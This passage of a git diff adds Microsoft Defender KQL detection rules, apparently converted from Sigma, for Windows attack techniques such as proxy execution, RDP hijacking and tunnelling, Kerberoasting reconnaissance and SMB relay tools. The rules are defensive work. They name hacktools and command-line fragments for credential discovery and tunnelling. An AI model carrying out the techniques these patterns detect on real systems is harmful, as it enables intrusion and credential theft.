+| where (ProcessCommandLine contains "Product" and (FolderPath endswith "\\wmic.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe")) and (not((ProcessCommandLine contains " uninstall" or ProcessCommandLine contains " install")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_provisioning_registry_key_abuse_for_binary_proxy_execution.kql b/KQL/rules/windows/process_creation/potential_provisioning_registry_key_abuse_for_binary_proxy_execution.kql
new file mode 100644
index 00000000..aec32e87
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_provisioning_registry_key_abuse_for_binary_proxy_execution.kql
@@ -0,0 +1,10 @@
+// Title: Potential Provisioning Registry Key Abuse For Binary Proxy Execution
+// Author: Nasreddine Bencherchali (Nextron Systems), Swachchhanda Shrawan Poudel
+// Date: 2023-08-08
+// Level: high
+// Description: Detects potential abuse of the provisioning registry key for indirect command execution through "Provlaunch.exe".
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "SOFTWARE\\Microsoft\\Provisioning\\Commands\\"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_provlaunch_exe_binary_proxy_execution_abuse.kql b/KQL/rules/windows/process_creation/potential_provlaunch_exe_binary_proxy_execution_abuse.kql
new file mode 100644
index 00000000..887036a8
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_provlaunch_exe_binary_proxy_execution_abuse.kql
@@ -0,0 +1,10 @@
+// Title: Potential Provlaunch.EXE Binary Proxy Execution Abuse
+// Author: Nasreddine Bencherchali (Nextron Systems), Swachchhanda Shrawan Poudel
+// Date: 2023-08-08
+// Level: medium
+// Description: Detects child processes of "provlaunch.exe" which might indicate potential abuse to proxy execution.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+
+DeviceProcessEvents
+| where InitiatingProcessFolderPath endswith "\\provlaunch.exe" and (not(((FolderPath endswith "\\calc.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\notepad.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\wscript.exe") or (FolderPath contains ":\\PerfLogs\\" or FolderPath contains ":\\Temp\\" or FolderPath contains ":\\Users\\Public\\" or FolderPath contains "\\AppData\\Temp\\" or FolderPath contains "\\Windows\\System32\\Tasks\\" or FolderPath contains "\\Windows\\Tasks\\" or FolderPath contains "\\Windows\\Temp\\"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_psexec_remote_execution.kql b/KQL/rules/windows/process_creation/potential_psexec_remote_execution.kql
new file mode 100644
index 00000000..8e770913
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_psexec_remote_execution.kql
@@ -0,0 +1,10 @@
+// Title: Potential PsExec Remote Execution
+// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-02-28
+// Level: high
+// Description: Detects potential psexec command that initiate execution on a remote systems via common commandline flags used by the utility
+// MITRE Tactic: Resource Development
+// Tags: attack.resource-development, attack.t1587.001
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "accepteula" and ProcessCommandLine contains " -u " and ProcessCommandLine contains " -p " and ProcessCommandLine contains " \\\\") and (not((ProcessCommandLine contains "\\\\localhost" or ProcessCommandLine contains "\\\\127.")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_ransomware_or_unauthorized_mbr_tampering_via_bcdedit_exe.kql b/KQL/rules/windows/process_creation/potential_ransomware_or_unauthorized_mbr_tampering_via_bcdedit_exe.kql
new file mode 100644
index 00000000..98ed62f8
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_ransomware_or_unauthorized_mbr_tampering_via_bcdedit_exe.kql
@@ -0,0 +1,10 @@
+// Title: Potential Ransomware or Unauthorized MBR Tampering Via Bcdedit.EXE
+// Author: @neu5ron
+// Date: 2019-02-07
+// Level: medium
+// Description: Detects potential malicious and unauthorized usage of bcdedit.exe
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1070, attack.persistence, attack.t1542.003
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "delete" or ProcessCommandLine contains "deletevalue" or ProcessCommandLine contains "import" or ProcessCommandLine contains "safeboot" or ProcessCommandLine contains "network") and (FolderPath endswith "\\bcdedit.exe" or ProcessVersionInfoOriginalFileName =~ "bcdedit.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_rdp_session_hijacking_activity.kql b/KQL/rules/windows/process_creation/potential_rdp_session_hijacking_activity.kql
new file mode 100644
index 00000000..eb7c9a45
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_rdp_session_hijacking_activity.kql
@@ -0,0 +1,12 @@
+// Title: Potential RDP Session Hijacking Activity
+// Author: @juju4
+// Date: 2022-12-27
+// Level: medium
+// Description: Detects potential RDP Session Hijacking activity on Windows systems
+// MITRE Tactic: Execution
+// Tags: attack.execution
+// False Positives:
+//   - Administrative activity
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\tscon.exe" or ProcessVersionInfoOriginalFileName =~ "tscon.exe") and (ProcessIntegrityLevel in~ ("System", "S-1-16-16384"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_rdp_tunneling_via_plink.kql b/KQL/rules/windows/process_creation/potential_rdp_tunneling_via_plink.kql
new file mode 100644
index 00000000..187c7cc7
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_rdp_tunneling_via_plink.kql
@@ -0,0 +1,10 @@
+// Title: Potential RDP Tunneling Via Plink
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-08-04
+// Level: high
+// Description: Execution of plink to perform data exfiltration and tunneling
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1572
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains ":127.0.0.1:3389" and FolderPath endswith "\\plink.exe") or ((ProcessCommandLine contains ":3389" and FolderPath endswith "\\plink.exe") and (ProcessCommandLine contains " -P 443" or ProcessCommandLine contains " -P 22"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_rdp_tunneling_via_ssh.kql b/KQL/rules/windows/process_creation/potential_rdp_tunneling_via_ssh.kql
new file mode 100644
index 00000000..e620dd1d
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_rdp_tunneling_via_ssh.kql
@@ -0,0 +1,10 @@
+// Title: Potential RDP Tunneling Via SSH
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-10-12
+// Level: high
+// Description: Execution of ssh.exe to perform data exfiltration and tunneling through RDP
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1572
+
+DeviceProcessEvents
+| where ProcessCommandLine contains ":3389" and FolderPath endswith "\\ssh.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_recon_activity_using_driverquery_exe.kql b/KQL/rules/windows/process_creation/potential_recon_activity_using_driverquery_exe.kql
new file mode 100644
index 00000000..d1a830fd
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_recon_activity_using_driverquery_exe.kql
@@ -0,0 +1,12 @@
+// Title: Potential Recon Activity Using DriverQuery.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-01-19
+// Level: high
+// Description: Detect usage of the "driverquery" utility to perform reconnaissance on installed drivers
+// MITRE Tactic: Discovery
+// Tags: attack.discovery
+// False Positives:
+//   - Legitimate usage by some scripts might trigger this as well
+
+DeviceProcessEvents
+| where (FolderPath endswith "driverquery.exe" or ProcessVersionInfoOriginalFileName =~ "drvqry.exe") and ((InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\regsvr32.exe" or InitiatingProcessFolderPath endswith "\\rundll32.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe") or (InitiatingProcessFolderPath contains "\\AppData\\Local\\" or InitiatingProcessFolderPath contains "\\Users\\Public\\" or InitiatingProcessFolderPath contains "\\Windows\\Temp\\"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_recon_activity_via_nltest_exe.kql b/KQL/rules/windows/process_creation/potential_recon_activity_via_nltest_exe.kql
new file mode 100644
index 00000000..357f8e77
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_recon_activity_via_nltest_exe.kql
@@ -0,0 +1,12 @@
+// Title: Potential Recon Activity Via Nltest.EXE
+// Author: Craig Young, oscd.community, Georg Lauenstein
+// Date: 2021-07-24
+// Level: medium
+// Description: Detects nltest commands that can be used for information discovery
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1016, attack.t1482
+// False Positives:
+//   - Legitimate administration use but user and host must be investigated
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\nltest.exe" or ProcessVersionInfoOriginalFileName =~ "nltestrk.exe") and ((ProcessCommandLine contains "server" and ProcessCommandLine contains "query") or (ProcessCommandLine contains "/user" or ProcessCommandLine contains "all_trusts" or ProcessCommandLine contains "dclist:" or ProcessCommandLine contains "dnsgetdc:" or ProcessCommandLine contains "domain_trusts" or ProcessCommandLine contains "dsgetdc:" or ProcessCommandLine contains "parentdomain" or ProcessCommandLine contains "trusted_domains"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_reconnaissance_activity_via_gathernetworkinfo_vbs.kql b/KQL/rules/windows/process_creation/potential_reconnaissance_activity_via_gathernetworkinfo_vbs.kql
new file mode 100644
index 00000000..dd870502
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_reconnaissance_activity_via_gathernetworkinfo_vbs.kql
@@ -0,0 +1,12 @@
+// Title: Potential Reconnaissance Activity Via GatherNetworkInfo.VBS
+// Author: blueteamer8699
+// Date: 2022-01-03
+// Level: medium
+// Description: Detects execution of the built-in script located in "C:\Windows\System32\gatherNetworkInfo.vbs". Which can be used to gather information about the target machine
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.execution, attack.t1615, attack.t1059.005
+// False Positives:
+//   - Administrative activity
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "gatherNetworkInfo.vbs" and ((FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\wscript.exe") or (ProcessVersionInfoOriginalFileName in~ ("cscript.exe", "wscript.exe")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_reconnaissance_for_cached_credentials_via_cmdkey_exe.kql b/KQL/rules/windows/process_creation/potential_reconnaissance_for_cached_credentials_via_cmdkey_exe.kql
new file mode 100644
index 00000000..f996d3c3
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_reconnaissance_for_cached_credentials_via_cmdkey_exe.kql
@@ -0,0 +1,12 @@
+// Title: Potential Reconnaissance For Cached Credentials Via Cmdkey.EXE
+// Author: jmallette, Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2019-01-16
+// Level: high
+// Description: Detects usage of cmdkey to look for cached credentials on the system
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003.005
+// False Positives:
+//   - Legitimate administrative tasks
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " -l" or ProcessCommandLine contains " /l" or ProcessCommandLine contains " –l" or ProcessCommandLine contains " —l" or ProcessCommandLine contains " ―l") and (FolderPath endswith "\\cmdkey.exe" or ProcessVersionInfoOriginalFileName =~ "cmdkey.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_reflectdebugger_content_execution_via_werfault_exe.kql b/KQL/rules/windows/process_creation/potential_reflectdebugger_content_execution_via_werfault_exe.kql
new file mode 100644
index 00000000..7b35469e
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_reflectdebugger_content_execution_via_werfault_exe.kql
@@ -0,0 +1,10 @@
+// Title: Potential ReflectDebugger Content Execution Via WerFault.EXE
+// Author: X__Junior (Nextron Systems)
+// Date: 2023-06-30
+// Level: medium
+// Description: Detects execution of "WerFault.exe" with the "-pr" commandline flag that is used to run files stored in the ReflectDebugger key which could be used to store the path to the malware in order to masquerade the execution flow
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.defense-evasion, attack.t1036
+
+DeviceProcessEvents
+| where ProcessCommandLine contains " -pr " and (FolderPath endswith "\\WerFault.exe" or ProcessVersionInfoOriginalFileName =~ "WerFault.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_register_app_vbs_lolscript_abuse.kql b/KQL/rules/windows/process_creation/potential_register_app_vbs_lolscript_abuse.kql
new file mode 100644
index 00000000..827d0d78
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_register_app_vbs_lolscript_abuse.kql
@@ -0,0 +1,12 @@
+// Title: Potential Register_App.Vbs LOLScript Abuse
+// Author: Austin Songer @austinsonger
+// Date: 2021-11-05
+// Level: medium
+// Description: Detects potential abuse of the "register_app.vbs" script that is part of the Windows SDK. The script offers the capability to register new VSS/VDS Provider as a COM+ application. Attackers can use this to install malicious DLLs for persistence and execution.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+// False Positives:
+//   - Other VB scripts that leverage the same starting command line flags
+
+DeviceProcessEvents
+| where ProcessCommandLine contains ".vbs -register " and ((FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\wscript.exe") or (ProcessVersionInfoOriginalFileName in~ ("cscript.exe", "wscript.exe")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_regsvr32_commandline_flag_anomaly.kql b/KQL/rules/windows/process_creation/potential_regsvr32_commandline_flag_anomaly.kql
new file mode 100644
index 00000000..889834e6
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_regsvr32_commandline_flag_anomaly.kql
@@ -0,0 +1,12 @@
+// Title: Potential Regsvr32 Commandline Flag Anomaly
+// Author: Florian Roth (Nextron Systems)
+// Date: 2019-07-13
+// Level: medium
+// Description: Detects a potential command line flag anomaly related to "regsvr32" in which the "/i" flag is used without the "/n" which should be uncommon.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.010
+// False Positives:
+//   - Administrator typo might cause some false positives
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains " -i:" or ProcessCommandLine contains " /i:" or ProcessCommandLine contains " –i:" or ProcessCommandLine contains " —i:" or ProcessCommandLine contains " ―i:") and FolderPath endswith "\\regsvr32.exe") and (not(ProcessCommandLine contains " -n " or ProcessCommandLine contains " /n " or ProcessCommandLine contains " –n " or ProcessCommandLine contains " —n " or ProcessCommandLine contains " ―n "))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_remote_desktop_tunneling.kql b/KQL/rules/windows/process_creation/potential_remote_desktop_tunneling.kql
new file mode 100644
index 00000000..a9e6a2a6
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_remote_desktop_tunneling.kql
@@ -0,0 +1,10 @@
+// Title: Potential Remote Desktop Tunneling
+// Author: Tim Rauch, Elastic (idea)
+// Date: 2022-09-27
+// Level: medium
+// Description: Detects potential use of an SSH utility to establish RDP over a reverse SSH Tunnel. This can be used by attackers to enable routing of network packets that would otherwise not reach their intended destination.
+// MITRE Tactic: Lateral Movement
+// Tags: attack.lateral-movement, attack.t1021
+
+DeviceProcessEvents
+| where ProcessCommandLine contains ":3389" and (ProcessCommandLine contains " -L " or ProcessCommandLine contains " -P " or ProcessCommandLine contains " -R " or ProcessCommandLine contains " -pw " or ProcessCommandLine contains " -ssh ")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_renamed_rundll32_execution.kql b/KQL/rules/windows/process_creation/potential_renamed_rundll32_execution.kql
new file mode 100644
index 00000000..ee44514b
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_renamed_rundll32_execution.kql
@@ -0,0 +1,12 @@
+// Title: Potential Renamed Rundll32 Execution
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-22
+// Level: high
+// Description: Detects when 'DllRegisterServer' is called in the commandline and the image is not rundll32. This could mean that the 'rundll32' utility has been renamed in order to avoid detection
+// MITRE Tactic: Execution
+// Tags: attack.execution
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "DllRegisterServer" and (not(FolderPath endswith "\\rundll32.exe"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_rundll32_execution_with_dll_stored_in_ads.kql b/KQL/rules/windows/process_creation/potential_rundll32_execution_with_dll_stored_in_ads.kql
new file mode 100644
index 00000000..52c140d9
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_rundll32_execution_with_dll_stored_in_ads.kql
@@ -0,0 +1,10 @@
+// Title: Potential Rundll32 Execution With DLL Stored In ADS
+// Author: Harjot Singh, '@cyb3rjy0t'
+// Date: 2023-01-21
+// Level: high
+// Description: Detects execution of rundll32 where the DLL being called is stored in an Alternate Data Stream (ADS).
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1564.004
+
+DeviceProcessEvents
+| where ProcessCommandLine matches regex "[Rr][Uu][Nn][Dd][Ll][Ll]32(\\.[Ee][Xx][Ee])? \\S+?\\w:\\S+?:" and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_script_proxy_execution_via_cl_mutexverifiers_ps1.kql b/KQL/rules/windows/process_creation/potential_script_proxy_execution_via_cl_mutexverifiers_ps1.kql
new file mode 100644
index 00000000..7f1b5c6c
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_script_proxy_execution_via_cl_mutexverifiers_ps1.kql
@@ -0,0 +1,10 @@
+// Title: Potential Script Proxy Execution Via CL_Mutexverifiers.ps1
+// Author: Nasreddine Bencherchali (Nextron Systems), oscd.community, Natalia Shornikova, frack113
+// Date: 2022-05-21
+// Level: medium
+// Description: Detects the use of the Microsoft signed script "CL_mutexverifiers" to proxy the execution of additional PowerShell script commands
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1216
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " -nologo -windowstyle minimized -file " and FolderPath endswith "\\powershell.exe" and (InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe")) and (ProcessCommandLine contains "\\AppData\\Local\\Temp\\" or ProcessCommandLine contains "\\Windows\\Temp\\")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_shelldispatch_dll_functionality_abuse.kql b/KQL/rules/windows/process_creation/potential_shelldispatch_dll_functionality_abuse.kql
new file mode 100644
index 00000000..2244e747
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_shelldispatch_dll_functionality_abuse.kql
@@ -0,0 +1,12 @@
+// Title: Potential ShellDispatch.DLL Functionality Abuse
+// Author: X__Junior (Nextron Systems)
+// Date: 2023-06-20
+// Level: medium
+// Description: Detects potential "ShellDispatch.dll" functionality abuse to execute arbitrary binaries via "ShellExecute"
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.defense-evasion
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "RunDll_ShellExecuteW" and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_shim_database_persistence_via_sdbinst_exe.kql b/KQL/rules/windows/process_creation/potential_shim_database_persistence_via_sdbinst_exe.kql
new file mode 100644
index 00000000..fbb6dafc
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_shim_database_persistence_via_sdbinst_exe.kql
@@ -0,0 +1,11 @@
+// Title: Potential Shim Database Persistence via Sdbinst.EXE
+// Author: Markus Neis
+// Date: 2019-01-16
+// Level: medium
+// Description: Detects installation of a new shim using sdbinst.exe.
+// Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.privilege-escalation, attack.t1546.011
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains ".sdb" and (FolderPath endswith "\\sdbinst.exe" or ProcessVersionInfoOriginalFileName =~ "sdbinst.exe")) and (not(((ProcessCommandLine contains ":\\Program Files (x86)\\IIS Express\\iisexpressshim.sdb" or ProcessCommandLine contains ":\\Program Files\\IIS Express\\iisexpressshim.sdb") and InitiatingProcessFolderPath endswith "\\msiexec.exe")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_signing_bypass_via_windows_developer_features.kql b/KQL/rules/windows/process_creation/potential_signing_bypass_via_windows_developer_features.kql
new file mode 100644
index 00000000..04b02374
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_signing_bypass_via_windows_developer_features.kql
@@ -0,0 +1,10 @@
+// Title: Potential Signing Bypass Via Windows Developer Features
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-01-11
+// Level: high
+// Description: Detects when a user enable developer features such as "Developer Mode" or "Application Sideloading". Which allows the user to install untrusted packages.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "TurnOnDeveloperFeatures" and (FolderPath endswith "\\SystemSettingsAdminFlows.exe" or ProcessVersionInfoOriginalFileName =~ "SystemSettingsAdminFlows.EXE") and (ProcessCommandLine contains "DeveloperUnlock" or ProcessCommandLine contains "EnableSideloading")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_smb_relay_attack_tool_execution.kql b/KQL/rules/windows/process_creation/potential_smb_relay_attack_tool_execution.kql
new file mode 100644
index 00000000..9a5eaee6
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_smb_relay_attack_tool_execution.kql
@@ -0,0 +1,12 @@
+// Title: Potential SMB Relay Attack Tool Execution
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-07-24
+// Level: critical
+// Description: Detects different hacktools used for relay attacks on Windows for privilege escalation
+// MITRE Tactic: Collection
+// Tags: attack.collection, attack.execution, attack.credential-access, attack.t1557.001
+// False Positives:
+//   - Legitimate files with these rare hacktool names
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains ".exe -c \"{" and ProcessCommandLine endswith "}\" -z") or (FolderPath contains "PetitPotam" or FolderPath contains "RottenPotato" or FolderPath contains "HotPotato" or FolderPath contains "JuicyPotato" or FolderPath contains "\\just_dce_" or FolderPath contains "Juicy Potato" or FolderPath contains "\\temp\\rot.exe" or FolderPath contains "\\Potato.exe" or FolderPath contains "\\SpoolSample.exe" or FolderPath contains "\\Responder.exe" or FolderPath contains "\\smbrelayx" or FolderPath contains "\\ntlmrelayx" or FolderPath contains "\\LocalPotato") or (ProcessCommandLine contains "Invoke-Tater" or ProcessCommandLine contains " smbrelay" or ProcessCommandLine contains " ntlmrelay" or ProcessCommandLine contains "cme smb " or ProcessCommandLine contains " /ntlm:NTLMhash " or ProcessCommandLine contains "Invoke-PetitPotam" or (ProcessCommandLine contains ".exe -t " and ProcessCommandLine contains " -p "))) and (not((FolderPath contains "HotPotatoes6" or FolderPath contains "HotPotatoes7" or FolderPath contains "HotPotatoes ")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_spn_enumeration_via_setspn_exe.kql b/KQL/rules/windows/process_creation/potential_spn_enumeration_via_setspn_exe.kql
new file mode 100644
index 00000000..98eb1efd
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_spn_enumeration_via_setspn_exe.kql
@@ -0,0 +1,12 @@
+// Title: Potential SPN Enumeration Via Setspn.EXE
+// Author: Markus Neis, keepwatch
+// Date: 2018-11-14
+// Level: medium
+// Description: Detects service principal name (SPN) enumeration used for Kerberoasting
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1558.003
+// False Positives:
+//   - Administration activity
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " -q " or ProcessCommandLine contains " /q ") and (FolderPath endswith "\\setspn.exe" or ProcessVersionInfoOriginalFileName =~ "setspn.exe" or (ProcessVersionInfoFileDescription contains "Query or reset the computer" and ProcessVersionInfoFileDescription contains "SPN attribute"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_ssh_tunnel_persistence_install_using_a_scheduled_task.kql b/KQL/rules/windows/process_creation/potential_ssh_tunnel_persistence_install_using_a_scheduled_task.kql
new file mode 100644
index 00000000..5f831e69
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_ssh_tunnel_persistence_install_using_a_scheduled_task.kql
@@ -0,0 +1,10 @@
+// Title: Potential SSH Tunnel Persistence Install Using A Scheduled Task
+// Author: Rory Duncan
+// Date: 2025-07-14
+// Level: high
+// Description: Detects the creation of new scheduled tasks via commandline, using Schtasks.exe. This rule detects tasks creating that call OpenSSH, which may indicate the creation of reverse SSH tunnel to the attacker's server.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.execution, attack.t1053.005, attack.command-and-control
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\schtasks.exe" or ProcessVersionInfoOriginalFileName =~ "schtasks.exe") and ((ProcessCommandLine contains " /create " and ProcessCommandLine contains "ssh.exe" and ProcessCommandLine contains "-i") or (ProcessCommandLine contains " /create " and ProcessCommandLine contains "sshd.exe" and ProcessCommandLine contains "-f"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_suspicious_activity_using_secedit.kql b/KQL/rules/windows/process_creation/potential_suspicious_activity_using_secedit.kql
new file mode 100644
index 00000000..13825854
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_suspicious_activity_using_secedit.kql
@@ -0,0 +1,12 @@
+// Title: Potential Suspicious Activity Using SeCEdit
+// Author: Janantha Marasinghe
+// Date: 2022-11-18
+// Level: medium
+// Description: Detects potential suspicious behaviour using secedit.exe. Such as exporting or modifying the security policy
+// MITRE Tactic: Collection
+// Tags: attack.collection, attack.discovery, attack.persistence, attack.defense-evasion, attack.credential-access, attack.privilege-escalation, attack.t1562.002, attack.t1547.001, attack.t1505.005, attack.t1556.002, attack.t1562, attack.t1574.007, attack.t1564.002, attack.t1546.008, attack.t1546.007, attack.t1547.014, attack.t1547.010, attack.t1547.002, attack.t1557, attack.t1082
+// False Positives:
+//   - Legitimate administrative use
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\secedit.exe" or ProcessVersionInfoOriginalFileName =~ "SeCEdit") and ((ProcessCommandLine contains "/configure" and ProcessCommandLine contains "/db") or (ProcessCommandLine contains "/export" and ProcessCommandLine contains "/cfg"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_suspicious_browser_launch_from_document_reader_process.kql b/KQL/rules/windows/process_creation/potential_suspicious_browser_launch_from_document_reader_process.kql
new file mode 100644
index 00000000..65341000
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_suspicious_browser_launch_from_document_reader_process.kql
@@ -0,0 +1,12 @@
+// Title: Potential Suspicious Browser Launch From Document Reader Process
+// Author: Joseph Kamau
+// Date: 2024-05-27
+// Level: medium
+// Description: Detects when a browser process or browser tab is launched from an application that handles document files such as Adobe, Microsoft Office, etc. And connects to a web application over http(s), this could indicate a possible phishing attempt.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1204.002
+// False Positives:
+//   - Unlikely in most cases, further investigation should be done in the commandline of the browser process to determine the context of the URL accessed.
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "http" and (FolderPath endswith "\\brave.exe" or FolderPath endswith "\\chrome.exe" or FolderPath endswith "\\firefox.exe" or FolderPath endswith "\\msedge.exe" or FolderPath endswith "\\opera.exe" or FolderPath endswith "\\maxthon.exe" or FolderPath endswith "\\seamonkey.exe" or FolderPath endswith "\\vivaldi.exe") and (InitiatingProcessFolderPath contains "Acrobat Reader" or InitiatingProcessFolderPath contains "Microsoft Office" or InitiatingProcessFolderPath contains "PDF Reader")) and (not(ProcessCommandLine contains "https://go.microsoft.com/fwlink/")) and (not(((ProcessCommandLine contains "http://ad.foxitsoftware.com/adlog.php") or (ProcessCommandLine contains "https://globe-map.foxitservice.com/go.php" and ProcessCommandLine contains "do=redirect"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_suspicious_mofcomp_execution.kql b/KQL/rules/windows/process_creation/potential_suspicious_mofcomp_execution.kql
new file mode 100644
index 00000000..46e88abb
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_suspicious_mofcomp_execution.kql
@@ -0,0 +1,12 @@
+// Title: Potential Suspicious Mofcomp Execution
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-07-12
+// Level: high
+// Description: Detects execution of the "mofcomp" utility as a child of a suspicious shell or script running utility or by having a suspicious path in the commandline.
+// The "mofcomp" utility parses a file containing MOF statements and adds the classes and class instances defined in the file to the WMI repository.
+// Attackers abuse this utility to install malicious MOF scripts
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+
+DeviceProcessEvents
